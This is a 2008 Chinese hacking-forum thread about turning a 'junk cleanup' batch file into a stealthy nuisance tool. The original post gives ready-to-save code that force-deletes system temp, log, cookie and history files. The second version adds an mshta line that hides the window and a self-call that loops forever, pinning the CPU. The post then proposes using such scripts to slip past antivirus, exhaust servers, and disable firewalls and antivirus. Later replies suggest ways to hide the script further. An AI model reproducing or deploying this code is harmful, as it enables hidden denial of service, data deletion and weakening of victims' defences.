标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
[打印本页]
作者:
平湖秋月
时间:
2008-9-13 23:51
标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序 说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
' ?0 \5 U# b, M% }$ V G& P9 T
a.bat源代码如下:
; u( l9 k5 z' H/ U
% {) B, b+ P$ W2 n4 \! a* t3 |
/ q$ H: b6 M6 b( y. z
===可以直接保存改名a.bat=====================
' Q9 U" p( \% W, X
@echo off
, l$ M7 U1 X3 A9 X7 S6 B; l
echo 正在清除系统垃圾文件,请稍等......
* r y6 f; T) g6 e( i+ T
@del /f /s /q %systemdrive%\*.tmp
N( S$ o5 H0 ?6 z: _
@del /f /s /q %systemdrive%\*._mp
- q. @: Z" T2 {) p, W: m7 H
@del /f /s /q %systemdrive%\*.log
5 w5 a) k- Z ~" m2 n3 M* o3 s. d0 M
@del /f /s /q %systemdrive%\*.gid
- H/ `, Y* f: C: h8 y$ O8 g
@del /f /s /q %systemdrive%\*.chk
( u& e7 M8 j- Y$ D4 U) Y
@del /f /s /q %systemdrive%\*.old
* G1 t5 M% T# H4 ~5 o t; o
@del /f /s /q %systemdrive%\recycled\*.*
2 j! W5 c3 I. r3 C0 @1 G% @
@del /f /s /q %windir%\*.bak
; Q' s' \( k1 Y3 y& c
@del /f /s /q %windir%\prefetch\*.*
: Y% n O1 g! U4 Z8 u
@rd /s /q %windir%\temp & md %windir%\temp
" H1 C9 B( z |! Z# }; X
@del /f /q %userprofile%\cookies\*.*
2 R( A/ y; ^: n) V8 @3 I
@del /f /q %userprofile%\recent\*.*
5 w. F: U+ L- V% Q
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
2 y) Y3 ^, z1 S, |5 E" X
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
: w3 B/ O1 o' S* j
@del /f /s /q "%userprofile%\recent\*.*"
" }- B/ R$ R# H/ ]$ Y3 U& Z/ k
echo 清除系统LJ完成!
' B+ }* p# |) `, r
其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:
* ^# ^' i1 A2 K3 R
, j) N" X2 o0 V9 j
===可以直接保存改名为a.bat
(一定要是a.bat哦具体说明原因你应该明白吧======
: l9 z1 Y- \9 r2 l4 t3 \4 h
@echo off
2 E6 d8 Y/ i5 Q) _7 x7 f% D
if "%1" == "h" goto begin
z* N' s; h1 f: |+ e7 N. B
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
' G. M# n5 J3 s% w4 T D
:begin
# @7 L# s0 l8 X5 r" H
echo 正在清除系统垃圾文件,请稍等......
# M8 d* c" m- ]# I+ Y7 \$ d7 _0 O
@@del /f /s /q %systemdrive%\*.tmp
6 W- w7 x$ ^7 d) o. S- b
@del /f /s /q %systemdrive%\*._mp
' M; w" J/ ?0 Z6 \& V' x
@del /f /s /q %systemdrive%\*.log
& J0 h a! s. p
@del /f /s /q %systemdrive%\*.gid
+ E9 f0 J, ]7 E8 ^. b W
@del /f /s /q %systemdrive%\*.chk
/ ~3 j# U: n/ X: Q' H4 n k O& P4 c
@del /f /s /q %systemdrive%\*.old
9 ^7 H. y: Q4 q2 }2 D7 x
@del /f /s /q %systemdrive%\recycled\*.*
& j' j+ n& o/ }: d8 N; [ g
@del /f /s /q %windir%\*.bak
; m. w) B* p7 k9 A# f3 Q4 ^4 J
@del /f /s /q %windir%\prefetch\*.*
6 f7 J1 Q) o/ f) A5 R8 p. c- y
@rd /s /q %windir%\temp & md %windir%\temp
2 y, L' t2 R: [% h2 v
@del /f /q %userprofile%\cookies\*.*
# E7 c+ {4 K; K* y
@del /f /q %userprofile%\recent\*.*
( |, O8 ~ Z8 [& G4 C9 w
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
& c* q. \6 d) \6 u4 [
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
0 ^8 l. s' W1 r' c
@del /f /s /q "%userprofile%\recent\*.*"
( h4 k2 ~; B0 K& w
echo 清除系统LJ完成!
% ]3 J# E2 Z# b% W( o6 [; g
call a.bat
6 n$ C' b) E6 o6 `
运行看看!什么效果?
& F- ~9 _$ Y# N& c2 J
对话框消失了!打开任务管理器查看显示CPU运用:100% 看进程里面cmd.exe占用CPU:99 本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
' j5 f& ?# P, L9 j9 j$ l+ r
+ T$ A8 f* O7 ]5 t: X
你说,我们可以利用这个BAT做些什么:
: T& L9 q7 v- ]+ Y8 p/ o* G
& z* H$ x, b z) b B
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
; Y- S# f5 N! y; z5 z, p9 j: J
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
( e: A4 M. H8 C# y. {$ ]
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月
作者:
上帝的爱
时间:
2008-9-14 05:03
想法非常不错
作者:
柔肠寸断
时间:
2008-9-14 17:34
打个岔,流氓的应用,呵呵
作者:
柔肠寸断
时间:
2008-9-14 17:38
现在来正经的回答下问题:
( Y) |( @" T9 s7 o% G
1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了
; {: O9 D& m* a. _$ {) |
, M# o3 ?: @; J
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者:
问道小生
时间:
2008-9-14 19:03
其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
: ~& [ q- b. M, d5 D0 _
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者:
平湖秋月
时间:
2008-9-15 21:43
楼上的你们说的都有道理 理论上是成立的 我有时间试试看
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
